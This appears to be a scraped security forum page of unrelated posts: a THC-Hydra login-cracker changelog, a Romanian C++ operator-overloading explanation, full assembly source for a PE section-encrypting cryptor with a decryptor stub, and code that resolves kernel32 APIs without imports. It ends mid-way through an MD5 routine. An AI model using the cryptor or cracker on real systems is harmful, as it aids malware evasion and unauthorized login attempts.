Nytro

THC-Hydra 6.2 THC-Hydra A very fast network logon cracker which support many different services. Have a look at the feature sets and services coverage page - including a speed comparison against ncrack and medusa! Last update 2011-04-06 [0x00] News and Changelog Hydra is now over 10 years old! Yeah! Good news: hydra is now co-maintained by David Maciejak @ gmail (dot) com, thanks a lot! Hydra is made available under GPLv3 with a special OpenSSL license expansion. No more windows .exe cygwin port. Too many clueless people hassled me why hydra.exe does not work for them when they double-click on it ... duh Check out the feature sets and services coverage page - including a speed comparison against ncrack and medusa (yes, we win ) It was tested to work on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX. CHANGELOG for 6.2 ================= * Added a patch by Jan Dlabal which adds password generation bruteforcing (no more password files ) * New module: XMPP with TLS negotiation and LOGIN, PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1 support * New module: IRC is not dead ! use to find general server password and /oper credential * Added man pages from debian maintainers * Add support for new syntax: ://[:][/] * Add TLS support for SIP * Add SCRAM-SHA1 auth to IMAP module * Add module usage help (-U) * Add support for RFC 4013: Internationalized Strings in SASL ("SASLPrep") * Add SASL + TLS support for NNTP * Add support for CRAM-MD5 and DIGEST-MD5 auth to ldap module * Add support for SCRAM-SHA1 (RFC 5802), first auth cracker to support it, yeah * Add TLS negotiation support for smtp-auth, pop3, imap, ftp and ldap * Rename smtpauth module to smtp * Forgot to rename ssh2 to ssh in xhydra, fixed * Fix SASL PLAIN auth method issue * Bugfix SASL DIGEST-MD5, response could be wrong on 64bits systems * Bugfix rlogin and rsh module, some auth failure could not be detected accurately * Add SSL support for VMware Authentication Daemon module * Bugfix CVS module, working now * Bugfix for Telnet module when line mode is not available Detalii: http://www.thc.org/thc-hydra/ Download: http://www.thc.org/download.php?t=r&f=hydra-6.2-src.tar.gz

Foarte misto explicat ca la prosti E facut mai mult pentru colegii mei care nu sunt tocmai pasionati de asa ceva. Insa nu prea m-am prins de un lucru ... cand supraincarci un operator .. de ex. = si faci a = b; nu ar trebui sa fie exact ca si a.operator=( iar antetul functiei sa fie void operator=(MyClass obj) si atribuirea sa se faca membru cu membru (in cazul datelor ... de obicei alea private) sau ceva de genul *this = b; ? Cand ai Obiect a, b; si vrei sa copiezi asa: a = b? La asta cred ca te referi. E simplu. Daca nu definesti tu constructorul de copiere Obiect(Obiect &operand) si nu supraincarci operatorul = pentru parametru de tip obiect, adica Obiect& Obiect::operator = (Obiect &), care face cam acelasi lucru, cel dintai apelandu-se la initializarea obiectului, in declaratie, atunci se vor defini cei impliciti si se va face o copiere bit cu bit, din "b" in "a". Problema apare cand lucrezi cu pointeri. Sa zicem ca memorezi intr-o clasa un sir de caractere: char *p_sir; La atribuirea bit cu bit, pointerul din "a" va pointa catre aceeasi adresa cu pointerul din "b". Adica se va copia adresa pointerului si ambele obiecte vor avea practic acelasi sir. Daca intre timp tu distrugi obiectul "b" si eliberezi memoria ocupata de sir, acesta nu va mai putea fi folosit nici in "a", deoarece e vorba de acelasi sir. Solutia e ca la constructorul de copiere si la supraincarcarea lui egal cu parametru un obiect de tipul clasei curente (transmis prin referinta) sa aloci spatiu pentru sirul din "a" si sa copiezi in el sirul din "b", astfel incat sa ai 2 siruri distincte. Aum sa trecem la ce te intereseaza pe tine. Desi pare ciudat, operatorul - returneaza o valoare. Daca nu ar returna nu ai putea folosi expresii ca: a = b = c;, mai multe expresii inlantuite. In expresia asta, cum operatorul - se evalueaza de la dreapta la stanga, mai intai b ia valoarea c, apoi expresia b = c returneaza pe b, care e apoi copiat in a; Pentru a putea face asta cu obiecte, supraincarcarea lui = trebuie sa returneze o referina la obiectul curent. Adica: Obiect& Obiect::operator = (Obiect &operand_2) { /* Copiere, in care pui valorile dorite in obiectul curent, pe care apoi il returnezi, pentru a putea fi folosit in continuare */ return *this; } Adica obiectul curent, determinat de *this e primul operand, iar cel de-al doilea operand e parametrul. Copiezi din parametru in *this ce iti trebuie si returnezi *this. Pe surt, a = b returneaza a. Si o ultima nedumerire care o am ... nu prea am inteles de ce in cazul unor functii virtuale la definirea lor se mai adauga dupa antet un const sau un tip de date ceva. Const se foloseste, in cazul de fata, pentru a defini funtii membru constante. Ideea cu ele e simpla: nu se va permite modificarea starii obiectului din aceste functii. Se definesc pentru a se asigura de acest lucru, adaugand un "const" dupa ()-le cu parametrii functiei. Insa cred ca tu te referi la functiile virtuale pure, care au un "= 0;" la sfarsit si nu sunt definite. Desigur, acel = 0 poate si de multe ori, si de preferat, este precedat de un "const". E alta treaba aici. Se folosesc pentru a defini o clasa abstracta, o clasa care nu poate fi instantiata, si care obliga clasele ce o mostenesc sa implementeze acele functii. Cred ca asta voiai sa stii, daca ai nelamuriri posteaza.

Simple PE Cryptor Demonstrate how to encrypt code and data section of any PE file. Full source code included. This is a very rough beta. include w32.inc include console.inc include message.inc include imghdr.inc extrn GetSystemTime:proc extrn VirtualAlloc:proc extrn VirtualFree:proc .DATA file_hnd dd 0 ; handle to opened file mem_offset dd 0 ; address of allocated memory obj_offset dd 0 ; address of import table peh_offset dd 0 ; address of pe header curr_disp dd 0 ; displacement rsrc_count dd 0 ; number of resource types num_rsrc dd 0 ; total number of resources rsrc_head dd 0 ; size of resourse header sys_time SYSTEMTIME <0> ; used in getsystime pe_h IMAGE_NT_HEADERS <0> ; pe header struc obj_table IMAGE_SECTION_HEADER 0Fh dup (<0>) ; section table struc header_len equ size pe_h + size obj_table ; length of header decryptor_len equ decryptor_end - decryptor_start ; lenght of decryptor it_len equ it_end - k32_original ; length of import table inside decryptor crypt_flag db 00,10,13 ; for stat display new_section: obj_name db '.hayras',0 ; section name virt_size dd 0 ; virtual size virt_addr dd 0 ; rva raw_size dd 0 ; size of file raw_offset dd 0 ; offset in file unused dd 0,0,0 ; others obj_flags dd 0E0000020h ; flag (r/w/c/x) .CODE start: ; ----- show intro ------------------------------------------------------------ call init_console ; initialize console push logo_l ; show this message push offset logo ; call write_console ; write to screen ; ----- get command line ------------------------------------------------------ call GetCommandLineA mov edi,eax ; address of name mov ecx, -1 ; counter mov al, 0 ; search byte push edi ; save for later repnz scasb ; search for end of name not ecx ; number of bytes read pop edi ; address of name mov al, 20h ; search byte repnz scasb ; get length of file name dec ecx ; skip extra space test ecx,ecx ; something there jnz open_file no_commandline: push no_cmd_l push offset no_cmd call write_console jmp quit ; ----- open file ------------------------------------------------------------- open_file: push 0 ; hTemplateFile push FILE_ATTRIBUTE_NORMAL ; dwFlagsAndAttribute push OPEN_EXISTING ; dwCreationDistribution push 0 ; lpSecurityAttribtes push 0 ; dwShareMode push GENERIC_READ + GENERIC_WRITE ; dwDesiredAccess push edi ; lpFileName call CreateFile cmp eax, INVALID_HANDLE_VALUE ; returned file handle jz file_not_found mov file_hnd, eax ; save file handle ; ----- get offset of pe header ----------------------------------------------- push FILE_BEGIN ; start of file push 0 ; lpDistanceToMoveHigh push 3Ch ; number of bytes to move (location of offset to pe header) push file_hnd ; handle of file call SetFilePointer push 0 ; lpOverlapped push offset bytes_read ; address of number of bytes read push 4 ; number of bytes to read push offset peh_offset ; address to store bytes read (offset to pe header) push file_hnd ; handle of file call ReadFile ; ----- read header to pe struc ----------------------------------------------- push 0 push 0 push peh_offset push file_hnd call SetFilePointer push 0 push offset bytes_read push header_len push offset pe_h push file_hnd call ReadFile ; ----- check pe signature ---------------------------------------------------- cmp [pe_h.Signature], IMAGE_NT_SIGNATURE ; check for 'PE' jnz not_valid_pe call show_some_info ; display some stats ; ----- get offset to object table -------------------------------------------- movzx eax, [pe_h.SizeOfOptionalHeader] ; size of optional header add eax, 18h ; offset to object table mov obj_offset, eax ; ----- check for space in object table --------------------------------------- movzx eax, [pe_h.NumberOfSections] ; number of sections inc eax ; add 1 for new section mov ecx, 28h ; size of section mul ecx ; num sections * 28h add eax, obj_offset ; offset of object table add eax, peh_offset ; offset to pe header cmp eax, [pe_h.SizeOfHeaders] jg no_space ; ----- store rva of import section ------------------------------------------- mov eax, [pe_h.DataDirectory.(8).VirtualAddress] mov it_address, eax ; ----- generate encryption key ----------------------------------------------- push offset sys_time ; SYSTEMTIME struc call GetSystemTime movzx ax, [sys_time.st_wMilliseconds] ; get millisecond mov key, al ; save as encryption key ; ----- encrypt objects ------------------------------------------------------- push sec_label_l ; header for section display push offset sec_label call write_console mov esi, offset obj_table ; start of section table movzx ecx, [pe_h.NumberOfSections] ; number of section as counter next_obj: call encrypt_objects ; encrypt each section call show_stats ; display some stats add esi, 28h ; next section in table loop next_obj ; ----- locate/add decryptor object in table ---------------------------------- mov esi, offset obj_table ; start of section table movzx eax, [pe_h.NumberOfSections] ; number of sections mov ecx, 28h ; size of section header mul ecx ; number of section * 28h add esi, eax ; end of section header inc [pe_h.NumberOfSections] ; add our section mov edi, offset new_section xchg edi, esi ; ----- calculate rva (aligned) ----------------------------------------------- mov eax, [edi-28h+8] ; (rva+size)/align add eax, [edi-28h+0Ch] mov ecx, [pe_h.SectionAlignment] cdq div ecx test edx, edx jz section_aligned inc eax section_aligned: mul ecx mov virt_addr, eax mov decr_rva, eax ; ----- calculate raw data size (aligned) ------------------------------------- mov eax, decryptor_len mov ecx, [pe_h.FileAlignment] div ecx test edx, edx jz file_aligned inc eax file_aligned: mul ecx mov [raw_size], eax ; ----- calculate virtual size (aligned) -------------------------------------- mov eax, decryptor_len mov ecx, [pe_h.SectionAlignment] div ecx test edx, edx jz sect_aligned inc eax sect_aligned: mul ecx mov virt_size, eax ; ----- calculate file offset ------------------------------------------------- mov eax, [edi-28h+14h] add eax, [edi-28h+10h] mov raw_offset, eax ; ----- calculate rva/size of import section ---------------------------------- mov eax, k32_original-decryptor_start add eax, decr_rva ; add rva or decryptor mov [pe_h.DataDirectory.(8).VirtualAddress], eax ; it rva in data dir mov [pe_h.DataDirectory.(8).Size], it_len ; it size add dword ptr k32_original, eax ; convert to rva add dword ptr k32_dll, eax ; add dword ptr k32_first, eax ; add dword ptr func_k32, eax ; add dword ptr [func_k32+4], eax ; add dword ptr [func_k32+8], eax ; add dword ptr [func_k32+0Ch], eax ; add dword ptr getproc, eax ; add dword ptr getmod, eax ; add dword ptr loadlib, eax ; add dword ptr u32_original, eax ; add dword ptr u32_dll, eax ; add dword ptr u32_first, eax ; add dword ptr func_u32, eax ; add dword ptr msgbox, eax ; add dword ptr cap_addr, eax ; add dword ptr msg_addr, eax ; ; ----- adjust size of image (aligned) ---------------------------------------- mov eax, virt_size add eax, [pe_h.SizeOfImage] mov ecx, [pe_h.SectionAlignment] div ecx test edx, edx jz image_aligned inc eax image_aligned: mul ecx mov [pe_h.SizeOfImage], eax ; ----- copy data to decryptor section ---------------------------------------- mov ecx, 28h rep movsb ; ----- store new entry point rva --------------------------------------------- mov eax, dword ptr virt_addr mov ebx, dword ptr [pe_h.AddressOfEntryPoint] mov [pe_h.AddressOfEntryPoint], eax mov original_erva, ebx ; ----- rewrite header ------------------------------------------------------- push 0 push 0 push peh_offset push file_hnd call SetFilePointer push 0 push offset bytes_read push header_len push offset pe_h file_hnd call WriteFile ; ----- write decryptor ------------------------------------------------------ push 0 push 0 push raw_offset push file_hnd call SetFilePointer push 0 push offset bytes_read push raw_size push offset decryptor_start push file_hnd call WriteFile push done_l push offset done call write_console jmp close_hnd ; ----- some error messages -------------------------------------------------- no_space: push no_o_space_l push offset no_o_space call write_console jmp close_hnd not_valid_pe: push not_pe_l push offset not_pe call write_console jmp close_hnd file_not_found: push file_nf_l push offset file_nf call write_console jmp quit ; ----- finished, lets close ------------------------------------------------- close_hnd: push file_hnd ; handle of file call CloseHandle quit: push 0 call ExitProcess ;------------------------------------------------------------------------------ show_some_info proc ;------------------------------------------------------------------------------ mov eax, [pe_h.SizeOfCode] push eax eax movzx eax, [pe_h.NumberOfSections] push eax offset num_secs call write_hex mov eax, [pe_h.SizeOfInitializedData] push eax eax mov eax, [pe_h.ImageBase] push eax offset img_base call write_hex mov eax, [pe_h.SizeOfUninitializedData] push eax eax mov eax, [pe_h.AddressOfEntryPoint] push eax offset ep_rva call write_hex mov eax, [pe_h.SectionAlignment] push eax eax mov eax, [pe_h.SizeOfImage] push eax offset size_img call write_hex mov eax, [pe_h.FileAlignment] push eax eax mov eax, [pe_h.SizeOfHeaders] push eax offset size_head call write_hex movzx eax, [pe_h.MinorLinkerVersion] push eax movzx eax, [pe_h.MajorLinkerVersion] push eax mov eax, [pe_h.BaseOfCode] push eax offset base_code call write_hex movzx eax, [pe_h.DllCharacteristics] push eax eax mov eax, [pe_h.BaseOfData] push eax offset base_data call write_hex ret endp ;------------------------------------------------------------------------------ show_stats proc ;------------------------------------------------------------------------------ push 8 esi call write_console push dword ptr [esi.SVirtualSize] push dword ptr [esi.SVirtualAddress] push dword ptr [esi.SizeOfRawData] push dword ptr [esi.PointerToRawData] push dword ptr [esi.SFlags] push offset sec_status call write_stat push 3 offset crypt_flag call write_console ret endp ;------------------------------------------------------------------------------ encrypt_objects proc ;------------------------------------------------------------------------------ pusha cmp [esi], 'adr.' ; skip .rdata jz set_flag cmp [esi], 'ade.' ; skip .edata jz set_flag cmp [esi], 'ler.' ; skip .reloc jz set_flag cmp [esi], 'slt.' ; skip .tls jz set_flag cmp dword ptr [esi.SizeOfRawData], 0 jz set_flag jmp proceed set_flag: mov crypt_flag, ' ' jmp no_encrypt ; ----- allocate memory ------------------------------------------------------- proceed: push PAGE_READWRITE push MEM_COMMIT push [esi.SizeOfRawData] push 0 call VirtualAlloc mov mem_offset, eax ; ----- read section to encrypt ----------------------------------------------- push 0 push 0 push [esi.PointerToRawData] push file_hnd call SetFilePointer push 0 push offset bytes_read push [esi.SizeOfRawData] push mem_offset push file_hnd call ReadFile cmp [esi], 'rsr.' jnz not_rsrc ; ----- resource routine ------------------------------------------------------ mov edi, mem_offset ; start of rsrc buffer mov edx, mem_offset movzx ecx, word ptr [edi.IRD_NumberOfNamedEntries] ; rsrc with names add cx, [edi.IRD_NumberOfIdEntries] ; rsrc with id mov rsrc_count, ecx ; number or rsrc type add edx, 10h ; skip root next_resource: ; num rsrc type as counter mov eax, [edx+4] ; offset to subdir and eax, 0FFFFFFFh ; mask offset add eax, edi ; address of subdir movzx ebx, word ptr [eax.IRD_NumberOfNamedEntries] add bx, [eax.IRD_NumberOfIdEntries] add num_rsrc, ebx cmp [eax.IRD_NumberOfNamedEntries], 0 jz not_named push ecx eax movzx ecx, [eax.IRD_NumberOfNamedEntries] add eax, 10h next_entry: movzx ebx, word ptr [eax] add ebx, edi movzx ebx, word ptr [ebx] imul ebx, 2 add ebx, 2 add rsrc_head, ebx add eax, 8 loop next_entry pop eax ecx not_named: add edx, 8 ; next resource type loop next_resource mov ecx, 30h mov eax, num_rsrc ; total number of resources mul ecx ; 30h * num of res add rsrc_head, eax mov ecx, 18h mov eax, rsrc_count ; 18h * number of res type mul ecx add rsrc_head, eax ; add em both add rsrc_head, 10h ; add size of main struc mov eax, rsrc_head ; length of resource header add mem_offset, eax ; skip the res header mov edi, mem_offset mov ecx, [esi.SizeOfRawData] ; size as counter sub ecx, [rsrc_head] mov al, key res_encrypt: sub byte ptr [edi], al ; encrypt inc al inc edi ; next byte loop res_encrypt mov eax, [esi.PointerToRawData] ; get file offset add eax, rsrc_head ; skip resource header push 0 push 0 push eax push file_hnd call SetFilePointer mov eax, [esi.SizeOfRawData] sub eax, rsrc_head ; skip resource header push 0 push offset bytes_read push eax push mem_offset push file_hnd call WriteFile ; write it mov edi, [curr_disp] mov eax, [esi+SVirtualAddress] add eax, rsrc_head ; skip resource header mov [object_rva+edi], eax ; save rva to decryptor mov eax, [esi.SizeOfRawData] sub eax, rsrc_head ; dont include rsrc header mov [object_size+edi], eax ; save size to decryptor jmp release_mem ; ----- store rva/size to decryptor ------------------------------------------- not_rsrc: mov edi, [curr_disp] mov eax, [esi+SVirtualAddress] mov [object_rva+edi], eax ; save rva to decryptor mov eax, [esi.SizeOfRawData] mov [object_size+edi], eax ; save size to decryptor mov edi, mem_offset ; start of buffer mov ecx, [esi.SizeOfRawData] ; size as counter mov al, key ; get key encrypt: sub byte ptr [edi], al ; encrypt inc al inc edi ; next byte loop encrypt ; ----- write encrypted section ----------------------------------------------- push 0 push 0 push [esi.PointerToRawData] ; point to push file_hnd call SetFilePointer push 0 push offset bytes_read push [esi.SizeOfRawData] ; size push mem_offset ; start here push file_hnd call WriteFile ; ----- deallocate memory ----------------------------------------------------- release_mem: push MEM_DECOMMIT ; fdwFreeType push [esi.SizeOfRawData] ; cbSize push mem_offset ; lpvAddress call VirtualFree ;----- update flags/number of objects ----------------------------------------- add [curr_disp], 8 ; update displacement inc byte ptr num_objects ; update counter or [esi.SFlags], 80000000h ; enable write bit mov crypt_flag, 0FBh ; for stat display no_encrypt: popa ret encrypt_objects endp .DATA ;------------------------------------------------------------------------------ decryptor_start: db '[SPEC]' call delta ; get delta offset delta: pop ebp mov eax, ebp ; save for imagebase calculation sub ebp, offset delta ; ebp = delta offset sub eax, [decr_rva+ebp] ; decryptor rva sub eax, offset delta-decryptor_start ; calculate current imagebase mov [image_base+ebp], eax ; store for later movzx esi, [num_objects+ebp] ; number of sections (use as counter) mov edi, ebp ; save delta next_object: mov ebx, [image_base+ebp] ; imagebase mov eax, [object_rva+edi] ; rva of encrypted section add ebx, eax ; imagebase+rva=address of section mov ecx, [object_size+edi] ; size of section (use as counter) mov al, [key+ebp] decrypt: add byte ptr [ebx], al ; decrypt inc al inc ebx ; next byte loop decrypt add edi, 8 ; next section dec esi ; dec section count jnz next_object ; until no more sections ; ----- fix import section ---------------------------------------------------- mov edx, [image_base+ebp] ; get image base mov esi, [it_address+ebp] ; rva of original import table add esi, edx ; address of import table next_dll: mov eax, [esi+0Ch] ; rva of dll name or eax, eax ; dll name present? jz dll_end add eax, edx ; address of dll name mov ebx, eax ; save for loadlibrary push eax ; push dll name call [getmod+ebp] ; call GetModuleHandleA or eax, eax ; loaded? jnz dll_loaded push ebx ; push dll name call [loadlib+ebp] ; call LoadLibrary or eax, eax ; success? jnz dll_loaded exit_loader: mov edx, [image_base+ebp] ; get imagebase add [cap_addr+ebp], edx ; add to offset add [msg_addr+ebp], edx push 0 ; null push [cap_addr+ebp] ; caption push [msg_addr+ebp] ; message push 0 ; mb ok call [msgbox+ebp] ; call MessageBoxA push 0 call [exitproc+ebp] ; call ExitProcess dll_loaded: mov [dll_hnd+ebp], eax ; save handle mov [func_disp+ebp], 0 ; initialize displacement next_function: mov edx, [ebp+image_base] ; imagebase mov eax, [esi] ; original first thunk (rva) or eax, eax ; is it there? jnz hint_ok mov eax, [esi+10h] ; no, then check out first thunk hint_ok: add eax, edx ; offset to function name add eax, [func_disp+ebp] ; displacement (first thunk) mov ebx, [eax] ; rva to function name mov edi, [esi+10h] ; first thunk (iat) add edi, edx ; address of iat add edi, [func_disp+ebp] ; displacement (iat) test ebx, ebx ; function present? jz function_end test ebx, 80000000h ; test for ordinal bit jnz func_ordinal ; if present, then function is ordinal only add ebx, edx ; address of function name add ebx, 2 ; skip ordinal func_ordinal: and ebx, 0FFFFFFFh push ebx ; offset of function name or ordinal push dword ptr [ebp+dll_hnd] ; handle of dll call [getproc+ebp] ; call GetpProcAddress or eax, eax jz exit_loader mov [edi], eax ; store address to iat add [func_disp+ebp], 4 ; update displacement jmp next_function function_end: add esi, 14h ; next import descriptor mov edx, [image_base+ebp] ; image base again jmp next_dll dll_end: mov eax, [original_erva+ebp] ; original entry point rva add eax, [image_base+ebp] ; add imagebase jmp eax ; jump to original entry point ;------------------------------------------------------------------------------ align 4 k32_original dd func_k32-k32_original ; original first thunk dd 0,0 ; time/date, forwarder k32_dll dd k32-k32_original ; rva to dll name k32_first dd getproc-k32_original ; first thunk u32_original dd func_u32-k32_original ; same as above, for user32 dd 0,0 u32_dll dd u32-k32_original u32_first dd msgbox-k32_original dd 5 dup (0) ; terminate import descriptor k32 db 'KERNEL32.DLL',0 ; dll to load func_k32 dd function1-k32_original ; rva's to function names dd function2-k32_original dd function3-k32_original dd function4-k32_original,0 u32 db 'USER32.DLL',0 func_u32 dd function5-k32_original,0 getproc dd 0 ; the iat getmod dd 0 ; the loader patches loadlib dd 0 ; this area exitproc dd 0 ; msgbox dd 0 dd 0 ; terminator function1 db 0,0,'GetProcAddress',0 ; function names function2 db 0,0,'GetModuleHandleA',0 function3 db 0,0,'LoadLibraryA',0 function4 db 0,0,'ExitProcess',0 function5 db 0,0,'MessageBoxA',0 align 4 it_end: cap_addr dd caption-k32_original ; offset to caption msg_addr dd message-k32_original ; offset to message caption db 'error',0 ; generic message message db 'loader failed', 0 key db 0 dll_hnd dd 0 ; handle to loaded dll func_disp dd 0 ; displacement in function name & iat it_address dd 0 ; rva of original import section decr_rva dd 0 ; rva of the decryptor image_base dd 0 ; image base num_objects db 0 ; number of encrypted sections original_erva dd 0 ; entry point rva object_rva dd 0 ; rva/size of encrypted sections object_size dd 0 dd 20h dup (0) decryptor_end: ;------------------------------------------------------------------------------ end start Download: http://win32assembly.online.fr/files/spec.zip

Get kernel ImageBase This is a small example of how to get the ImageBase of Kernel32.dll and how to get addresses of the kernel's LoadLibrary and GetProcAddress functions without any APIs ! I tested this code on Win98SE and Win2k. For any comments or bugreports trop a line to yoda_f2f@gmx.net. HAppy New Year ! yoda .386 .model flat,stdcall option casemap:none INCLUDE \masm32\include\windows.inc INCLUDE \masm32\include\comdlg32.inc INCLUDELIB \masm32\lib\comdlg32.lib ; ------ STRUCTS ------ sSEH STRUCT OrgEsp DD ? OrgEbp DD ? SaveEip DD ? sSEH ENDS ; ------ EQU'S ------ MIN_KERNEL_SEARCH_BASE EQU 070000000h MAX_API_STRING_LENGTH EQU 150 ; ------ CONST ------ .CONST szLoadLibrary DB "LoadLibraryA",0 szGetProcAddress DB "GetProcAddress",0 szExitProcess DB "ExitProcess",0 szUser32 DB "user32",0 szMessageBox DB "MessageBoxA",0 szwsprintf DB "wsprintfA",0 szInfoCap DB "- Kernel -",0 szInfoText DB "The following information were obtained",13,10 DB "without the help of an Import Table !",13,10 DB 13,10 DB "Kernel32.dll ImageBase: 0x%08lX",13,10 DB "User32.dll ImageBase: 0x%08lX",13,10 DB 13,10 DB "API Addresses:",13,10 DB "LoadLibraryA: 0x%08lX",13,10 DB "GetProcAddress: 0x%08lX",13,10 DB "ExitProcess: 0x%08lX",13,10 DB 13,10 DB "MessageBoxA: 0x%08lX",13,10 DB "wsprintfA: 0x%08lX",0 ; ------ DATA ------ .DATA _LoadLibrary DD 0 _GetProcAddress DD 0 _ExitProcess DD 0 _MessageBox DD 0 _wsprintf DD 0 cBuff DB 200 DUP (0) SEH sSEH <0> dwKernelBase DD 0 dwUserBase DD 0 ; ------ CODE ------ .CODE main: ASSUME FS : NOTHING ;INT 3 ;---- GET ImageBase of kernel32.dll ---- PUSH [ESP] CALL GetKernelBase OR EAX, EAX JZ QUIT MOV dwKernelBase, EAX ;---- GET SOME KERNEL API ADDRESSES ---- ;-> LoadLibraryA PUSH OFFSET szLoadLibrary PUSH dwKernelBase CALL GetProcAddr OR EAX, EAX JZ QUIT MOV _LoadLibrary, EAX ;-> GetProcAddress PUSH OFFSET szGetProcAddress PUSH dwKernelBase CALL GetProcAddr OR EAX, EAX JZ QUIT MOV _GetProcAddress, EAX ;-> ExitProcess PUSH OFFSET szExitProcess PUSH dwKernelBase CALL GetProcAddr OR EAX, EAX JZ QUIT MOV _ExitProcess, EAX ;---- LOAD USER32.DLL ---- PUSH OFFSET szUser32 CALL _LoadLibrary OR EAX, EAX JZ QUIT MOV dwUserBase, EAX ;---- GET SOME USER API ADDRESSES ---- ;-> MessageBoxA PUSH OFFSET szMessageBox PUSH dwUserBase CALL GetProcAddr OR EAX, EAX JZ QUIT MOV _MessageBox, EAX ;-> wsprintfA PUSH OFFSET szwsprintf PUSH dwUserBase CALL GetProcAddr OR EAX, EAX JZ QUIT MOV _wsprintf, EAX ;---- BUILD AND SHOW THE INFORMATION MSG ---- PUSH _wsprintf PUSH _MessageBox PUSH _ExitProcess PUSH _GetProcAddress PUSH _LoadLibrary PUSH dwUserBase PUSH dwKernelBase PUSH OFFSET szInfoText PUSH OFFSET cBuff CALL _wsprintf ADD ESP, (9 * SIZEOF(DWORD)) PUSH MB_ICONINFORMATION OR MB_SYSTEMMODAL PUSH OFFSET szInfoCap PUSH OFFSET cBuff PUSH 0 CALL _MessageBox ;---- EXIT ---- CALL _ExitProcess QUIT: RET ; exit to OS ;---- AN UNUSED IMPORT ---- ; The Win32 Loader of Win2k (maybe also of WinNT) won't call the EntryPoint of files which don't ; have an Import Table ; So here's an unused Import to make MASM compile an Import Table. PUSH NULL CALL GetOpenFileName ; ------ ROUTINES ------ ; returns NULL in the case of an error GetKernelBase PROC USES EDI ESI, dwTopStack : DWORD ; install SEH frame PUSH OFFSET SehHandler PUSH FS:[0] MOV SEH.OrgEsp, ESP MOV SEH.OrgEbp, EBP MOV SEH.SaveEip, OFFSET ExceptCont MOV FS:[0], ESP ; start the search MOV EDI, dwTopStack AND EDI, 0FFFF0000h ; wipe the LOWORD ! .WHILE TRUE .IF WORD PTR [EDI] == IMAGE_DOS_SIGNATURE MOV ESI, EDI ADD ESI, [ESI+03Ch] .IF DWORD PTR [ESI] == IMAGE_NT_SIGNATURE .BREAK .ENDIF .ENDIF ExceptCont: SUB EDI, 010000h .IF EDI < MIN_KERNEL_SEARCH_BASE MOV EDI, 0BFF70000h .BREAK .ENDIF .ENDW XCHG EAX, EDI ; shutdown SEH frame POP FS:[0] ADD ESP, 4 RET GetKernelBase ENDP ; returns address or NULL in the case of an error GetProcAddr PROC USES ESI EDI ECX EBX EDX, dwDllBase : DWORD, szApi : LPSTR ; install SEH frame PUSH OFFSET SehHandler PUSH FS:[0] MOV SEH.OrgEsp, ESP MOV SEH.OrgEbp, EBP MOV SEH.SaveEip, OFFSET @@BadExit MOV FS:[0], ESP ; check PE Signarue MOV ESI, dwDllBase CMP WORD PTR [ESI], IMAGE_DOS_SIGNATURE JNZ @@BadExit ADD ESI, [ESI+03Ch] CMP DWORD PTR [ESI], IMAGE_NT_SIGNATURE JNZ @@BadExit ; get the string length of the target Api MOV EDI, szApi MOV ECX, MAX_API_STRING_LENGTH XOR AL, AL REPNZ SCASB MOV ECX, EDI SUB ECX, szApi ; ECX -> Api string length ; trace the export table MOV EDX, [ESI+078h] ; EDX -> Export table ADD EDX, dwDllBase ASSUME EDX : PTR IMAGE_EXPORT_DIRECTORY MOV EBX, [EDX].AddressOfNames ; EBX -> AddressOfNames array pointer ADD EBX, dwDllBase XOR EAX, EAX ; EAX AddressOfNames Index .REPEAT MOV EDI, [EBX] ADD EDI, dwDllBase MOV ESI, szApi PUSH ECX ; save the api string length REPZ CMPSB .IF ZERO? ADD ESP, 4 .BREAK .ENDIF POP ECX ADD EBX, 4 INC EAX .UNTIL EAX == [EDX].NumberOfNames ; did we found sth ? .IF EAX == [EDX].NumberOfNames JMP @@BadExit .ENDIF ; find the corresponding Ordinal MOV ESI, [EDX].AddressOfNameOrdinals ADD ESI, dwDllBase PUSH EDX ; save the export table pointer MOV EBX, 2 XOR EDX, EDX MUL EBX POP EDX ADD EAX, ESI XOR ECX, ECX MOV WORD PTR CX, [EAX] ; ECX -> Api Ordinal ; get the address of the api MOV EDI, [EDX].AddressOfFunctions XOR EDX, EDX MOV EBX, 4 MOV EAX, ECX MUL EBX ADD EAX, dwDllBase ADD EAX, EDI MOV EAX, [EAX] ADD EAX, dwDllBase JMP @@ExitProc ASSUME EDX : NOTHING @@BadExit: XOR EAX, EAX @@ExitProc: ; shutdown SEH frame POP FS:[0] ADD ESP, 4 RET GetProcAddr ENDP SehHandler PROC C pExcept:DWORD,pFrame:DWORD,pContext:DWORD,pDispatch:DWORD MOV EAX, pContext ASSUME EAX : PTR CONTEXT PUSH SEH.SaveEip POP [EAX].regEip PUSH SEH.OrgEsp POP [EAX].regEsp PUSH SEH.OrgEbp POP [EAX].regEbp MOV EAX, ExceptionContinueExecution RET SehHandler ENDP end main Demonstrate how to search for and obtain the module base address of kernel32.dll and the addresses of the functions in it without using any API function. Tested on both Win98 and Win2k Download: http://win32assembly.online.fr/files/kernel.zip

MD5 Algorithm ;____________________________________________________________________________________________________________________________ ; MD5hash : hashes a string using the md5 algorithm ;¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ; input : ; ptBuffer: pointer to the string buffer (doesn' t have to be zero-terminated, must be at least 64bytes large) ; dtBufferLength: length of the buffer ; ptMD5Result: pointer to a MD5RESULT structure ; output : ; ptMD5Result: contains the hash dwords in dtA, dtB, dtC, dtD ;____________________________________________________________________________________________________________________________ ; roy|fleur ;¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ MD5hash proto :dword,:dword,:dword MD5RESULT STRUCT dtA dd ? dtB dd ? dtC dd ? dtD dd ? MD5RESULT ENDS FF MACRO dta,dtb,dtc,dtd,x,s,t ; a = b + ((a + F(b,c,d) + x + t) << s ) mov eax,dtb mov 